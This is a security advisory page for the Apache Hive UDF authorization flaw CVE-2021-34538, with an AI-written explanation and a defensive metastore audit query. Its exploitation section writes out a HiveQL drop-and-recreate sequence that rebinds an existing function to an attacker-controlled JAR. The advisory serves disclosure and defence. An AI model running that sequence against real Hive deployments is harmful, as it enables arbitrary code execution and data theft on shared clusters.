VYPR
High severity · NVD Advisory · Published Jul 16, 2022 · Updated Aug 4, 2024

Apache Hive Security vulnerability in Hive with UDFs

CVE-2021-34538

Description

Apache Hive before 3.1.3: the "CREATE" and "DROP" function operations do not check for the necessary authorization on the entities involved in the query. An unauthorized user can manipulate an existing UDF without holding the privileges to do so. This allows unauthorized or underprivileged users to drop and recreate UDFs, pointing them at new JARs that could be malicious.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Apache Hive before 3.1.3 lacks authorization checks on CREATE/DROP FUNCTION, allowing unauthorized users to manipulate UDFs with potentially malicious jars.

Root Cause

CVE-2021-34538 is an authorization bypass vulnerability in Apache Hive, affecting versions prior to 3.1.3. The core issue lies in the CREATE FUNCTION and DROP FUNCTION operations, which fail to verify that the user executing the command has the necessary privileges on the involved entities. This means that the authorization checks are either missing or improperly implemented for these specific operations [1].

Exploitation

Exploitation requires only the ability to submit HiveQL through a Hive query interface (for example HiveServer2 via JDBC or Beeline); no elevated privileges are needed. By issuing DROP FUNCTION and then CREATE FUNCTION against an existing user-defined function (UDF), the attacker rebinds the function name to a class inside a Java archive (JAR) the attacker controls, at a path Hive can load it from. No authentication bypass or additional privilege is required beyond the ability to run Hive queries [1].
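The statement sequence described above, written out in HiveQL as an added example (this is not code from the advisory or from the Hive project). The database name analytics, the function mask_ssn, the class com.example.udf.MaskSSN and the HDFS paths are hypothetical; the statement forms (CREATE FUNCTION ... AS ... USING JAR, DROP FUNCTION, SHOW FUNCTIONS) are Hive's own.

```sql
-- Added example, not from the advisory. Names, class and paths are hypothetical.

-- Step 0: what an administrator registered earlier. A permanent UDF is a
-- metastore record that binds a name to a class name plus a resource URI;
-- the JAR is fetched from that URI when the function is first resolved.
--   CREATE FUNCTION analytics.mask_ssn AS 'com.example.udf.MaskSSN'
--     USING JAR 'hdfs:///apps/udfs/mask-udf-1.0.jar';

-- Step 1: a low-privileged session drops the function. Before Hive 3.1.3 this
-- succeeds without any privilege check on the function or its database.
DROP FUNCTION analytics.mask_ssn;

-- Step 2: recreate it under the same name and the same class name, but bound
-- to a JAR in a location the attacker can write to. Callers see no change.
CREATE FUNCTION analytics.mask_ssn AS 'com.example.udf.MaskSSN'
  USING JAR 'hdfs:///user/attacker/mask-udf-1.0.jar';

-- Step 3: any later caller, including privileged users and scheduled jobs,
-- loads the attacker's JAR when the function is resolved. The UDF can still
-- return the expected masked value while doing something else on the side.
SELECT analytics.mask_ssn(ssn) FROM analytics.customers LIMIT 10;

-- The name-level view does not expose the swap: the function is still listed.
SHOW FUNCTIONS LIKE 'analytics.*';

-- On 3.1.3 and later, steps 1 and 2 are subject to an authorization check and
-- fail for a session that lacks the privilege on the function's database.
```

The point of step 2 is that the class name and function name are unchanged, so a query author has no way to notice the substitution from the query side; the only durable evidence is the resource URI recorded in the metastore.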

Impact

Successful exploitation lets an unauthorized or underprivileged user alter the behavior of a UDF. When the UDF is subsequently called by other users (including privileged ones), the code in the attacker-supplied JAR runs in the context of the Hive process that evaluates the query (HiveServer2 or the execution engine's tasks). This can lead to arbitrary code execution, data exfiltration, or further compromise of the Hive metastore and the underlying Hadoop cluster [1].

Mitigation

The vulnerability is fixed in Apache Hive version 3.1.3. Users running earlier versions should upgrade to this release or later. As of the CVE publication date, no workarounds have been documented, and the vulnerability has not been listed in CISA’s Known Exploited Vulnerabilities (KEV) catalog. The official Hive repository and release notes [2] provide details on obtaining the patched version.
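A check a practitioner can run while an upgrade is pending, added here as an example and not part of the advisory: inventory every permanent UDF registered in the Hive metastore together with the JAR it loads, so that a function rebound to an unexpected location, or created by an unexpected owner, stands out. It queries the metastore's backing RDBMS directly (tables DBS, FUNCS and FUNC_RU, as named in the Hive metastore schema); the trusted JAR prefix hdfs:///apps/udfs/, the administrator account list and the MySQL FROM_UNIXTIME() call are assumptions to adjust for your deployment.

```sql
-- Added example, not from the advisory. Run against the Hive metastore database
-- (MySQL syntax; on PostgreSQL replace FROM_UNIXTIME(x) with to_timestamp(x)).
-- Assumptions: trusted UDF JARs live under hdfs:///apps/udfs/ and only the
-- accounts listed below are allowed to own permanent functions.

SELECT d.NAME                        AS db_name,
       f.FUNC_NAME                   AS func_name,
       f.CLASS_NAME                  AS class_name,
       f.OWNER_NAME                  AS owner_name,
       FROM_UNIXTIME(f.CREATE_TIME)  AS created_at,
       r.RESOURCE_TYPE               AS resource_type,   -- 1 = JAR in the metastore enum
       r.RESOURCE_URI                AS resource_uri,
       CASE
         WHEN r.RESOURCE_URI IS NULL                         THEN 'no resource recorded'
         WHEN r.RESOURCE_URI NOT LIKE 'hdfs:///apps/udfs/%'   THEN 'JAR outside trusted path'
         WHEN f.OWNER_NAME NOT IN ('hive', 'udf_admin')       THEN 'unexpected owner'
         ELSE 'ok'
       END                           AS finding
FROM FUNCS f
JOIN DBS d          ON d.DB_ID   = f.DB_ID
LEFT JOIN FUNC_RU r ON r.FUNC_ID = f.FUNC_ID
-- Report only the suspicious rows; drop this WHERE to get the full inventory.
WHERE r.RESOURCE_URI IS NULL
   OR r.RESOURCE_URI NOT LIKE 'hdfs:///apps/udfs/%'
   OR f.OWNER_NAME NOT IN ('hive', 'udf_admin')
ORDER BY f.CREATE_TIME DESC, d.NAME, f.FUNC_NAME;
```

Because a drop-and-recreate produces a fresh FUNCS row, CREATE_TIME and OWNER_NAME change even when the function and class names do not, so a snapshot of this query taken once and diffed on a schedule will catch a rebinding that SHOW FUNCTIONS on the Hive side cannot. Pair it with a verification that each listed JAR's checksum matches the artifact you deployed.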

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                 Ecosystem   Affected versions   Patched versions
org.apache.hive:hive    Maven       < 3.1.3             3.1.3

Affected products: 2

Patches: 0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References: 3

News mentions: 0

No linked articles in our index yet.